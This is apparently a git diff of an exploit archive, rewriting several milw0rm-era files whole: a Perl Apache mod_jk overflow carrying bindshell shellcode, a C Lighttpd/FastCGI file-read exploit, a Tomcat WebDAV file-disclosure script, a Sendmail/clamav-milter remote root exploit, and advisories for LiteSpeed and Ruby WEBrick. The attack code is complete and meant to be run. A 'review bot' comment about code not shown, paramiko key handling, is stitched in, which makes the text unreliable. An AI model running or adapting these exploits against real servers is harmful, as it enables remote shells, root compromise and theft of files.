LOGGER.info("connected!") + LOGGER.info (""" +Available commands: + .info + .readfile + .writefile + .exit .quit + +""") + while True: + cmd = raw_input("#> ").strip() + if cmd.lower().startswith(".exit") or cmd.lower().startswith(".quit"): + break + elif cmd.lower().startswith(".info"): + LOGGER.info(ex.exploit("\ninfo")) + elif cmd.lower().startswith(".readfile"): + LOGGER.info(ex.exploit_fwd_readfile(cmd.split(" ",1)[1])) + elif cmd.lower().startswith(".writefile"): + parts = cmd.split(" ") + LOGGER.info(ex.exploit_fwd_write_(parts[1],' '.join(parts[2:]))) + else: + LOGGER.info(ex.exploit('\n%s'%cmd)) + + # just playing around + #print ex.exploit_fwd_readfile("/etc/passwd") + #print ex.exploit("\ninfo") + #print ex.exploit("\ngenerate :600 .") # generate :port port=port+6000 + #print ex.exploit("\nlist") + #print ex.exploit("\nnlist") + #print ex.exploit('\nadd xx xx "\n') + #print ex.exploit('\ngenerate :0 . data "') + #print ex.exploit('\n?\n') + #print ex.exploit_fwd_readfile("/etc/passwd") + #print ex.exploit_fwd_write_("/tmp/somefile", data="`whoami`") + LOGGER.info("--quit--") diff --git a/platforms/multiple/remote/4093.pl b/platforms/multiple/remote/4093.pl index ebe12790b..fbada0537 100755 --- a/platforms/multiple/remote/4093.pl +++ b/platforms/multiple/remote/4093.pl 
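Review bot: In the `__main__` block the private-key branch sets `password = None` before it calls `open(password,'r')`, so passing a key-file path raises `TypeError` and the key is never read; the assignment belongs after the file has been read: `with open(password,'r') as f:` / `pkey = f.read()` / `password = None`. `logging.basicConfig(loglevel=logging.DEBUG)` passes a keyword that `basicConfig` does not define — Python 2.7 drops it silently, so the intended `level=logging.DEBUG` never takes effect at the root logger. `set_missing_host_key_policy(paramiko.AutoAddPolicy())` in `__init__` accepts any server host key without verification, which deserves a comment next to it such as `# NOTE: host keys are not verified; any server key is accepted`, since the tool may send a real password. The start of this hunk, including its file header and the usage string, is garbled in this view and could not be reviewed.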
@@ -1,95 +1,95 @@ -# Apache w/ mod_jk Remote Exploit -# by eliteboy - -use IO::Socket; - -print "***ELiTEBOY*PRESENTZ***APACHE*MOD_JK*REMOTE*EXPLOIT***\n"; - -$target = $ARGV[1]; -if (($#ARGV != 1) || ($target < 1) || ($target > 3)) { - print "Usage: modjkx.pl \n"; - print "1.\tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.20\n" - ."\tDebian 3.1/4.0*Apache 2.2.4/2.2.3&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19\n"; - print "2.\tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.19\n" - ."\tDebian 3.1 Sarge*Apache 2.2.4&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19\n"; - print "3.\tFreeBSD5.4-RELEASE *** Apache 2.2.4 mod_jk-1.2.20/mod_jk-1.2.19\n"; - exit; -} - -$port = 80; - -### lnx metasploit bindshell code port 2007 -my $lnx_shellcode = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". -"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x48\x49\x51\x5a\x6a\x49". -"\x58\x50\x30\x42\x31\x42\x41\x6b\x41\x41\x59\x41\x32\x41\x41\x32". -"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x69\x79\x37\x41\x6b". -"\x6b\x63\x63\x57\x33\x72\x73\x73\x5a\x76\x62\x32\x4a\x55\x36\x51". -"\x48\x4e\x79\x4e\x69\x38\x61\x6a\x6d\x4f\x70\x7a\x36\x77\x33\x30". -"\x52\x42\x46\x31\x78\x46\x67\x38\x57\x30\x66\x50\x53\x6d\x59\x4b". -"\x51\x32\x4a\x63\x56\x70\x58\x50\x50\x50\x51\x50\x56\x6f\x79\x4b". -"\x51\x7a\x6d\x4f\x70\x48\x30\x65\x36\x4b\x61\x4d\x33\x38\x4d\x4b". -"\x30\x72\x72\x50\x52\x56\x36\x42\x63\x6b\x39\x68\x61\x6e\x50\x33". -"\x56\x68\x4d\x6b\x30\x6d\x43\x70\x6a\x33\x32\x66\x39\x6c\x70\x37". -"\x4f\x58\x4d\x6f\x70\x42\x69\x31\x69\x39\x69\x6e\x50\x74\x4b\x46". -"\x32\x32\x48\x56\x4f\x46\x4f\x64\x33\x62\x48\x35\x38\x56\x4f\x42". -"\x42\x30\x69\x50\x6e\x6b\x39\x4a\x43\x56\x32\x73\x63\x4b\x39\x48". -"\x61\x68\x4d\x6d\x50\x49"; - -### bsd metasploit bindshell code port 5555 -my $bsd_shellcode = -"\xeb\x59\x59\x59\x59\xeb\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". -"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". 
-"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". -"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". -"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". -"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\xe8\xa4\xff\xff\xff". -"\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49". -"\x49\x49\x51\x5a\x6a\x42\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x52". -"\x42\x41\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50". -"\x75\x59\x79\x53\x5a\x31\x71\x33\x68\x4d\x49\x50\x52\x32\x48\x76". -"\x70\x43\x32\x55\x45\x6f\x43\x6c\x49\x68\x61\x36\x32\x51\x52\x36". -"\x32\x62\x62\x52\x72\x50\x6a\x66\x70\x5a\x6d\x4f\x70\x4f\x69\x6f". -"\x63\x50\x51\x32\x73\x73\x62\x50\x6a\x72\x48\x36\x38\x38\x4d\x4f". -"\x70\x4c\x70\x51\x7a\x68\x4d\x6f\x70\x62\x72\x62\x73\x50\x52\x58". -"\x30\x65\x4e\x5a\x6d\x4d\x50\x6c\x57\x32\x4a\x66\x62\x31\x49\x41". -"\x7a\x41\x4a\x52\x78\x46\x31\x30\x57\x32\x71\x4a\x6d\x4d\x50\x77". -"\x39\x51\x69\x6c\x35\x30\x50\x32\x48\x66\x4f\x56\x4f\x32\x53\x62". -"\x48\x52\x48\x76\x4f\x70\x62\x32\x49\x50\x6e\x4d\x59\x5a\x43\x52". -"\x70\x72\x74\x56\x33\x70\x53\x6e\x50\x47\x4b\x38\x4d\x6b\x30\x42". -"A" x 100; - -$alignment = 4127; - -$|=1; - -if ($target eq 1) { - $shellcode = $lnx_shellcode; - $addr = 0xbffff060; -} - -if ($target eq 2) { - $shellcode = $lnx_shellcode; - $addr = 0xbfffef4c; -} - -if ($target eq 3) { - $shellcode = $bsd_shellcode; - $addr = 0xbfbfe5d5; -} - -$offset = pack('l', $addr); - -$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], - PeerPort => $port, - Proto => 'tcp'); - -$a = "A" x ($alignment-4-length($shellcode)) . $shellcode . 
$offset; - -print $sock "GET /$a HTTP/1.0\r\n\r\n"; - -while(<$sock>) { - print; -} - -# milw0rm.com [2007-06-22] +# Apache w/ mod_jk Remote Exploit +# by eliteboy + +use IO::Socket; + +print "***ELiTEBOY*PRESENTZ***APACHE*MOD_JK*REMOTE*EXPLOIT***\n"; + +$target = $ARGV[1]; +if (($#ARGV != 1) || ($target < 1) || ($target > 3)) { + print "Usage: modjkx.pl \n"; + print "1.\tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.20\n" + ."\tDebian 3.1/4.0*Apache 2.2.4/2.2.3&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19\n"; + print "2.\tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.19\n" + ."\tDebian 3.1 Sarge*Apache 2.2.4&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19\n"; + print "3.\tFreeBSD5.4-RELEASE *** Apache 2.2.4 mod_jk-1.2.20/mod_jk-1.2.19\n"; + exit; +} + +$port = 80; + +### lnx metasploit bindshell code port 2007 +my $lnx_shellcode = +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". +"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x48\x49\x51\x5a\x6a\x49". +"\x58\x50\x30\x42\x31\x42\x41\x6b\x41\x41\x59\x41\x32\x41\x41\x32". +"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x69\x79\x37\x41\x6b". +"\x6b\x63\x63\x57\x33\x72\x73\x73\x5a\x76\x62\x32\x4a\x55\x36\x51". +"\x48\x4e\x79\x4e\x69\x38\x61\x6a\x6d\x4f\x70\x7a\x36\x77\x33\x30". +"\x52\x42\x46\x31\x78\x46\x67\x38\x57\x30\x66\x50\x53\x6d\x59\x4b". +"\x51\x32\x4a\x63\x56\x70\x58\x50\x50\x50\x51\x50\x56\x6f\x79\x4b". +"\x51\x7a\x6d\x4f\x70\x48\x30\x65\x36\x4b\x61\x4d\x33\x38\x4d\x4b". +"\x30\x72\x72\x50\x52\x56\x36\x42\x63\x6b\x39\x68\x61\x6e\x50\x33". +"\x56\x68\x4d\x6b\x30\x6d\x43\x70\x6a\x33\x32\x66\x39\x6c\x70\x37". +"\x4f\x58\x4d\x6f\x70\x42\x69\x31\x69\x39\x69\x6e\x50\x74\x4b\x46". +"\x32\x32\x48\x56\x4f\x46\x4f\x64\x33\x62\x48\x35\x38\x56\x4f\x42". +"\x42\x30\x69\x50\x6e\x6b\x39\x4a\x43\x56\x32\x73\x63\x4b\x39\x48". 
+"\x61\x68\x4d\x6d\x50\x49"; + +### bsd metasploit bindshell code port 5555 +my $bsd_shellcode = +"\xeb\x59\x59\x59\x59\xeb\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". +"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". +"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". +"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". +"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". +"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\xe8\xa4\xff\xff\xff". +"\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49". +"\x49\x49\x51\x5a\x6a\x42\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x52". +"\x42\x41\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50". +"\x75\x59\x79\x53\x5a\x31\x71\x33\x68\x4d\x49\x50\x52\x32\x48\x76". +"\x70\x43\x32\x55\x45\x6f\x43\x6c\x49\x68\x61\x36\x32\x51\x52\x36". +"\x32\x62\x62\x52\x72\x50\x6a\x66\x70\x5a\x6d\x4f\x70\x4f\x69\x6f". +"\x63\x50\x51\x32\x73\x73\x62\x50\x6a\x72\x48\x36\x38\x38\x4d\x4f". +"\x70\x4c\x70\x51\x7a\x68\x4d\x6f\x70\x62\x72\x62\x73\x50\x52\x58". +"\x30\x65\x4e\x5a\x6d\x4d\x50\x6c\x57\x32\x4a\x66\x62\x31\x49\x41". +"\x7a\x41\x4a\x52\x78\x46\x31\x30\x57\x32\x71\x4a\x6d\x4d\x50\x77". +"\x39\x51\x69\x6c\x35\x30\x50\x32\x48\x66\x4f\x56\x4f\x32\x53\x62". +"\x48\x52\x48\x76\x4f\x70\x62\x32\x49\x50\x6e\x4d\x59\x5a\x43\x52". +"\x70\x72\x74\x56\x33\x70\x53\x6e\x50\x47\x4b\x38\x4d\x6b\x30\x42". +"A" x 100; + +$alignment = 4127; + +$|=1; + +if ($target eq 1) { + $shellcode = $lnx_shellcode; + $addr = 0xbffff060; +} + +if ($target eq 2) { + $shellcode = $lnx_shellcode; + $addr = 0xbfffef4c; +} + +if ($target eq 3) { + $shellcode = $bsd_shellcode; + $addr = 0xbfbfe5d5; +} + +$offset = pack('l', $addr); + +$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], + PeerPort => $port, + Proto => 'tcp'); + +$a = "A" x ($alignment-4-length($shellcode)) . $shellcode . $offset; + +print $sock "GET /$a HTTP/1.0\r\n\r\n"; + +while(<$sock>) { + print; +} + +# milw0rm.com [2007-06-22] 
diff --git a/platforms/multiple/remote/4391.c b/platforms/multiple/remote/4391.c
index fb83a8f43..59364228e 100755
--- a/platforms/multiple/remote/4391.c
+++ b/platforms/multiple/remote/4391.c
@@ -1,144 +1,144 @@ -/* - * Remote Lighttpd + FastCGI + PHP example exploit - * - * Tested with Lighttpd 1.4.16 and PHP 5.2.4 - * - * To avoid abuse there's a "remove me" in the code. - * - * Example: - * - * # ./exploit localhost 80 /etc/passwd - * - * or - * - * # wget --referer="" localhost - * # ./exploit localhost 80 /var/log/lighttpd/access.log - * - * - * Mattias Bengtsson - * - * http://www.secweb.se/ - * - */ - -#include -#include -#include -#include - -#include -#include - -#include -#include -#include - -int append_header(char *p, int c, int a, int b) -{ - c = 0x41 + (c % 25); - - memset(p, c, a + b + 4); - - p[a + 0 + 0] = ':'; - p[a + 0 + 1] = ' '; - p[a + b + 2] = '\r'; - p[a + b + 3] = '\n'; - - return a + b + 4; -} - -int network(const char *host, int port) -{ - struct sockaddr_in addr; - struct hostent *he; - int sock; - - sock = socket(AF_INET, SOCK_STREAM, 0); - - addr.sin_family = AF_INET; - - if((he = gethostbyname(host)) == NULL) - return 0; - - memcpy(&addr.sin_addr, he->h_addr_list[0], he->h_length); - - addr.sin_port = htons(port); - - connect(sock, (struct sockaddr *)&addr, sizeof(addr)); - - return sock; -} - -int main(int argc, char **argv) -{ - char *b, *p; - int sock, i; - char tmp[1024]; - - if(argc < 4) { - fprintf(stderr, "Usage: %s \n", argv[0]); - exit(0); - } - - sock = network(argv[1], atoi(argv[2])); - - if(sock <= 0) { - fprintf(stderr, "Host down?\n"); - exit(0); - } - - b = p = malloc(0xffff + 0xffff); - - p += sprintf(p, "GET /index.php HTTP/1.1\r\n"); - p += sprintf(p, "Host: %s\r\n", argv[1]); - p += sprintf(p, "A: A\r\nB: "); - - *p++ = 128; - *p++ = 0x00; - *p++ = 0x54; - *p++ = 0x42; - *p++ = '\r'; - *p++ = '\n'; - p = 0x00; - - p += append_header(p, 0, 4, 1); - p += append_header(p, 1, 200 , 25079); - - p -= 3631; - - *p++ = 1; // Version - *p++ = 4; // Type - *p++ = 0; - *p++ = 0; - - i = sprintf(tmp, "SCRIPT_FILENAME"); - sprintf(tmp + i, "%s", argv[3]); - - *p++ = 0x00; // Length - *p++ = 2 + strlen(tmp); // Length 
- *p++ = 0x00; // Padding - *p++ = 0x10; - *p++ = i; // name_len - *p++ = strlen(tmp) - i; // var_len - - memcpy(p, tmp, strlen(tmp)); - - p += 3631 - 8 - 2; - - p += append_header(p, 2, 200, 40007); - p += sprintf(p, "\r\n\r\n"); - - write(sock, b, (p - b)); - - i = read(sock, b, 0xffff); - *(b + i) = 0; - - printf("%s\n", b); - - free(b); - close(sock); - - return 0; -} - -// milw0rm.com [2007-09-10] +/* + * Remote Lighttpd + FastCGI + PHP example exploit + * + * Tested with Lighttpd 1.4.16 and PHP 5.2.4 + * + * To avoid abuse there's a "remove me" in the code. + * + * Example: + * + * # ./exploit localhost 80 /etc/passwd + * + * or + * + * # wget --referer="" localhost + * # ./exploit localhost 80 /var/log/lighttpd/access.log + * + * + * Mattias Bengtsson + * + * http://www.secweb.se/ + * + */ + +#include +#include +#include +#include + +#include +#include + +#include +#include +#include + +int append_header(char *p, int c, int a, int b) +{ + c = 0x41 + (c % 25); + + memset(p, c, a + b + 4); + + p[a + 0 + 0] = ':'; + p[a + 0 + 1] = ' '; + p[a + b + 2] = '\r'; + p[a + b + 3] = '\n'; + + return a + b + 4; +} + +int network(const char *host, int port) +{ + struct sockaddr_in addr; + struct hostent *he; + int sock; + + sock = socket(AF_INET, SOCK_STREAM, 0); + + addr.sin_family = AF_INET; + + if((he = gethostbyname(host)) == NULL) + return 0; + + memcpy(&addr.sin_addr, he->h_addr_list[0], he->h_length); + + addr.sin_port = htons(port); + + connect(sock, (struct sockaddr *)&addr, sizeof(addr)); + + return sock; +} + +int main(int argc, char **argv) +{ + char *b, *p; + int sock, i; + char tmp[1024]; + + if(argc < 4) { + fprintf(stderr, "Usage: %s \n", argv[0]); + exit(0); + } + + sock = network(argv[1], atoi(argv[2])); + + if(sock <= 0) { + fprintf(stderr, "Host down?\n"); + exit(0); + } + + b = p = malloc(0xffff + 0xffff); + + p += sprintf(p, "GET /index.php HTTP/1.1\r\n"); + p += sprintf(p, "Host: %s\r\n", argv[1]); + p += sprintf(p, "A: A\r\nB: "); + + *p++ = 128; 
+ *p++ = 0x00; + *p++ = 0x54; + *p++ = 0x42; + *p++ = '\r'; + *p++ = '\n'; + p = 0x00; + + p += append_header(p, 0, 4, 1); + p += append_header(p, 1, 200 , 25079); + + p -= 3631; + + *p++ = 1; // Version + *p++ = 4; // Type + *p++ = 0; + *p++ = 0; + + i = sprintf(tmp, "SCRIPT_FILENAME"); + sprintf(tmp + i, "%s", argv[3]); + + *p++ = 0x00; // Length + *p++ = 2 + strlen(tmp); // Length + *p++ = 0x00; // Padding + *p++ = 0x10; + *p++ = i; // name_len + *p++ = strlen(tmp) - i; // var_len + + memcpy(p, tmp, strlen(tmp)); + + p += 3631 - 8 - 2; + + p += append_header(p, 2, 200, 40007); + p += sprintf(p, "\r\n\r\n"); + + write(sock, b, (p - b)); + + i = read(sock, b, 0xffff); + *(b + i) = 0; + + printf("%s\n", b); + + free(b); + close(sock); + + return 0; +} + +// milw0rm.com [2007-09-10] diff --git a/platforms/multiple/remote/4399.html b/platforms/multiple/remote/4399.html index 3034e07af..fdd75a87a 100755 --- a/platforms/multiple/remote/4399.html +++ b/platforms/multiple/remote/4399.html @@ -1,14 +1,14 @@ - - - - - - -# milw0rm.com [2007-09-12] + + + + + + +# milw0rm.com [2007-09-12] diff --git a/platforms/multiple/remote/4530.pl b/platforms/multiple/remote/4530.pl index 8f3021ec9..e0884ca1a 100755 --- a/platforms/multiple/remote/4530.pl +++ b/platforms/multiple/remote/4530.pl 
@@ -1,79 +1,79 @@ -#!/usr/bin/perl -#****************************************************** -# Apache Tomcat Remote File Disclosure Zeroday Xploit -# kcdarookie aka eliteb0y / 2007 -# -# thanx to the whole team & andi :) -# +++KEEP PRIV8+++ -# -# This Bug may reside in different WebDav implementations, -# Warp your mind! -# +You will need auth for the exploit to work... -#****************************************************** - -use IO::Socket; -use MIME::Base64; ### FIXME! Maybe support other auths too ? - -# SET REMOTE PORT HERE -$remoteport = 8080; - -sub usage { - print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n"; - print "kcdarookie aka eliteb0y / 2007\n"; - print "usage: perl TOMCATXPL [username] [password]\n"; - print "example: perl TOMCATXPL www.hostname.com /webdav /etc/passwd tomcat tomcat\n";exit; -} - -if ($#ARGV < 2) {usage();} - -$hostname = $ARGV[0]; -$webdavfile = $ARGV[1]; -$remotefile = $ARGV[2]; - -$username = $ARGV[3]; -$password = $ARGV[4]; - -my $sock = IO::Socket::INET->new(PeerAddr => $hostname, - PeerPort => $remoteport, - Proto => 'tcp'); - -$|=1; -$BasicAuth = encode_base64("$username:$password"); - -$KRADXmL = -"\n" -."\n" -."]>\n" -."\n" -."\n" -."\n" -."\n" -."\n" -."\n" -."&RemoteX;\n" -."\n" -."\n" -."\n" -."\n"; - -print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n"; -print "kcdarookie aka eliteb0y / 2007\n"; -print "Launching Remote Exploit...\n"; - -$ExploitRequest = - "LOCK $webdavfile HTTP/1.1\r\n" -."Host: $hostname\r\n"; - -if ($username ne "") { -$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n"; -} -$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . 
$KRADXmL; - -print $sock $ExploitRequest; - -while(<$sock>) { - print; -} - -# milw0rm.com [2007-10-14] +#!/usr/bin/perl +#****************************************************** +# Apache Tomcat Remote File Disclosure Zeroday Xploit +# kcdarookie aka eliteb0y / 2007 +# +# thanx to the whole team & andi :) +# +++KEEP PRIV8+++ +# +# This Bug may reside in different WebDav implementations, +# Warp your mind! +# +You will need auth for the exploit to work... +#****************************************************** + +use IO::Socket; +use MIME::Base64; ### FIXME! Maybe support other auths too ? + +# SET REMOTE PORT HERE +$remoteport = 8080; + +sub usage { + print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n"; + print "kcdarookie aka eliteb0y / 2007\n"; + print "usage: perl TOMCATXPL [username] [password]\n"; + print "example: perl TOMCATXPL www.hostname.com /webdav /etc/passwd tomcat tomcat\n";exit; +} + +if ($#ARGV < 2) {usage();} + +$hostname = $ARGV[0]; +$webdavfile = $ARGV[1]; +$remotefile = $ARGV[2]; + +$username = $ARGV[3]; +$password = $ARGV[4]; + +my $sock = IO::Socket::INET->new(PeerAddr => $hostname, + PeerPort => $remoteport, + Proto => 'tcp'); + +$|=1; +$BasicAuth = encode_base64("$username:$password"); + +$KRADXmL = +"\n" +."\n" +."]>\n" +."\n" +."\n" +."\n" +."\n" +."\n" +."\n" +."&RemoteX;\n" +."\n" +."\n" +."\n" +."\n"; + +print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n"; +print "kcdarookie aka eliteb0y / 2007\n"; +print "Launching Remote Exploit...\n"; + +$ExploitRequest = + "LOCK $webdavfile HTTP/1.1\r\n" +."Host: $hostname\r\n"; + +if ($username ne "") { +$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n"; +} +$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL; + +print $sock $ExploitRequest; + +while(<$sock>) { + print; +} + +# milw0rm.com [2007-10-14] diff --git a/platforms/multiple/remote/4556.txt b/platforms/multiple/remote/4556.txt index ff0aabc5e..0322ad79f 100755 
--- a/platforms/multiple/remote/4556.txt +++ b/platforms/multiple/remote/4556.txt 
@@ -1,75 +1,75 @@ -######################################################################################## -########### _______ __ _____ ___ __ ########### -########### |_ _| |--.-----.| \.-----.' _|.---.-.----.-----.--| | ########### -########### | | | | -__|| -- | -__| _|| _ | __| -__| _ | ########### -########### |___| |__|__|_____||_____/|_____|__| |___._|____|_____|_____| ########### -########### ########### -########### TheDefaced.org ########### -########### TheDefaced Security Team Presents An 0-day. ########### -########### LiteSpeed Remote Mime Type Injection ########### -########### Discovered by:Tr3mbl3r ########### -########### Shouts to his kitty kats and tacos. ########### -######################################################################################## -# Product: # -# LiteSpeed/Discovered in <==3.2.3 Should work in all other versions below. # -# # -# Vuln: # -# Remote Mime Type Injection # -# # -# Description: # -# Litespeed will parse an URL/Files mimetype incorrectly. # -# When given a nullbyte. # -# # -# Patch: # -# Upgrade to LiteSpeed 3.2.4 has just been released today. # -# 9:15AM PST OCT 22 When I wrote this it's now 9:30AM PST OCT 22 # -# # -# This vuln was found before an update was released they fixed it after they found it..# -# In their logs. # -# # -# Risk: Extremely High # -######################################################################################## -# Example: # -# Basicly if you had a URL like so http://www.site.com/index.php. # -# And you wanted this websites source you could simply add a nullbyte and an extension # -# Like So http://www.site.com/index.php%00.txt # -# Litespeed would then at this point asume the file is a txt file. # -# # -# Keep in mind that this vuln is Mime Type Injection... so it works with any type. # -# Like if you did %00.rar it would asume the index.php was a rar file. # -# Theres a numerous ammount of things you could do. 
# -# # -# As to of why litespeed does this is not confirmed by us just yet. # -# # -# I asume it has somthing to do with mimetype handling thus the name of the exploit. # -# MimeType Injection. # -######################################################################################## -# An Example of This Vuln being put in to use. # -# # -# The Following is WordPress.com's Wp-Config.php # -# http://wordpress.com/wp-config.php%00.txt # -######################################################################################## -# ########### -# # -# # -################################################################################################## -# Contact Us # -################################################################################################## -# WebSite: http://www.thedefaced.org # -# Forums for more info: http://www.thedefaced.org/forums/ # -# IRC: irc.thedefaced.org/#TheDefaced # -################################################################################################## - -# milw0rm.com [2007-10-22] +######################################################################################## +########### _______ __ _____ ___ __ ########### +########### |_ _| |--.-----.| \.-----.' _|.---.-.----.-----.--| | ########### +########### | | | | -__|| -- | -__| _|| _ | __| -__| _ | ########### +########### |___| |__|__|_____||_____/|_____|__| |___._|____|_____|_____| ########### +########### ########### +########### TheDefaced.org ########### +########### TheDefaced Security Team Presents An 0-day. ########### +########### LiteSpeed Remote Mime Type Injection ########### +########### Discovered by:Tr3mbl3r ########### +########### Shouts to his kitty kats and tacos. ########### +######################################################################################## +# Product: # +# LiteSpeed/Discovered in <==3.2.3 Should work in all other versions below. 
# +# # +# Vuln: # +# Remote Mime Type Injection # +# # +# Description: # +# Litespeed will parse an URL/Files mimetype incorrectly. # +# When given a nullbyte. # +# # +# Patch: # +# Upgrade to LiteSpeed 3.2.4 has just been released today. # +# 9:15AM PST OCT 22 When I wrote this it's now 9:30AM PST OCT 22 # +# # +# This vuln was found before an update was released they fixed it after they found it..# +# In their logs. # +# # +# Risk: Extremely High # +######################################################################################## +# Example: # +# Basicly if you had a URL like so http://www.site.com/index.php. # +# And you wanted this websites source you could simply add a nullbyte and an extension # +# Like So http://www.site.com/index.php%00.txt # +# Litespeed would then at this point asume the file is a txt file. # +# # +# Keep in mind that this vuln is Mime Type Injection... so it works with any type. # +# Like if you did %00.rar it would asume the index.php was a rar file. # +# Theres a numerous ammount of things you could do. # +# # +# As to of why litespeed does this is not confirmed by us just yet. # +# # +# I asume it has somthing to do with mimetype handling thus the name of the exploit. # +# MimeType Injection. # +######################################################################################## +# An Example of This Vuln being put in to use. 
# +# # +# The Following is WordPress.com's Wp-Config.php # +# http://wordpress.com/wp-config.php%00.txt # +######################################################################################## +# ########### +# # +# # +################################################################################################## +# Contact Us # +################################################################################################## +# WebSite: http://www.thedefaced.org # +# Forums for more info: http://www.thedefaced.org/forums/ # +# IRC: irc.thedefaced.org/#TheDefaced # +################################################################################################## + +# milw0rm.com [2007-10-22] diff --git a/platforms/multiple/remote/4761.pl b/platforms/multiple/remote/4761.pl index d16c5c1e5..44bed6a3b 100755 --- a/platforms/multiple/remote/4761.pl +++ b/platforms/multiple/remote/4761.pl 
@@ -1,28 +1,28 @@ -### black-hole.pl -### Sendmail w/ clamav-milter Remote Root Exploit -### Copyright (c) 2007 Eliteboy -######################################################## -use IO::Socket; - -print "Sendmail w/ clamav-milter Remote Root Exploit\n"; -print "Copyright (C) 2007 Eliteboy\n"; - -if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;} - -print "Attacking $ARGV[0]...\n"; - -$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], - PeerPort => '25', - Proto => 'tcp'); - -print $sock "ehlo you\r\n"; -print $sock "mail from: <>\r\n"; -print $sock "rcpt to: > /etc/inetd.conf\"@localhost>\r\n"; -print $sock "rcpt to: \r\n"; -print $sock "data\r\n.\r\nquit\r\n"; - -while (<$sock>) { - print; -} - -# milw0rm.com [2007-12-21] +### black-hole.pl +### Sendmail w/ clamav-milter Remote Root Exploit +### Copyright (c) 2007 Eliteboy +######################################################## +use IO::Socket; + +print "Sendmail w/ clamav-milter Remote Root Exploit\n"; +print "Copyright (C) 2007 Eliteboy\n"; + +if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;} + +print "Attacking $ARGV[0]...\n"; + +$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], + PeerPort => '25', + Proto => 'tcp'); + +print $sock "ehlo you\r\n"; +print $sock "mail from: <>\r\n"; +print $sock "rcpt to: > /etc/inetd.conf\"@localhost>\r\n"; +print $sock "rcpt to: \r\n"; +print $sock "data\r\n.\r\nquit\r\n"; + +while (<$sock>) { + print; +} + +# milw0rm.com [2007-12-21] diff --git a/platforms/multiple/remote/5215.txt b/platforms/multiple/remote/5215.txt index 357d10999..847a61ff5 100755 --- a/platforms/multiple/remote/5215.txt +++ b/platforms/multiple/remote/5215.txt 
@@ -1,111 +1,111 @@ ------------------------------------------------------------------------------------- -Digital Security Research Group [DSecRG] Advisory #DSECRG-08-018 - - -Application: Ruby 1.8.6 (WEBrick Web server Toolkit and applications that used WEBrick, like Metasploit 3.1) -Versions Affected: - 1.8.4 and all prior versions - 1.8.5-p114 and all prior versions - 1.8.6-p113 and all prior versions - 1.9.0-1 and all prior version - -Vendor URL: http://www.ruby-lang.org/ -Bugs: Directory traversal File Download -Exploits: YES -Reported: 20.02.2008 -Vendor response: 22.02.2008 -Solution: 03.03.2008 -Date of Public Advisory: 06.03.2008 -Authors: Alexandr Polyakov, Stas Svistunovich - Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) - - - -Description -*********** - -WEBrick Httpd server has directory traversal security vulnerability. - -WEBrick is an HTTP server library written in Ruby that uses servlets to extend its capabilities. -Built into WEBrick are four servlets, handling CGI, ERb, file directories, and a generic Proc servlet. -Ruby on Rails uses WEBrick as a quick and easy webserver to start developing your Rails applications. -However, for whatever ease of development WEBrick adds to your application, it is generally considered not suitable for any production environment. - - - - -Details -******* - -The following programs are vulnerable. - -Programs that publish files using WEBrick::HTTPServer.new with the :DocumentRoot option -Programs that publish files using WEBrick::HTTPServlet::FileHandler - -Affected systems are: -1. Systems that accept backslash (\) as a path separator, such as Windows. -2. Systems that use case insensitive filesystems such as NTFS on Windows, HFS on Mac OS X. - - -This vulnerability has the following impacts. -1. Attacker can access private files by sending a url with url encoded backslash (\). This exploit works only on systems that accept backslash as a path separator. 
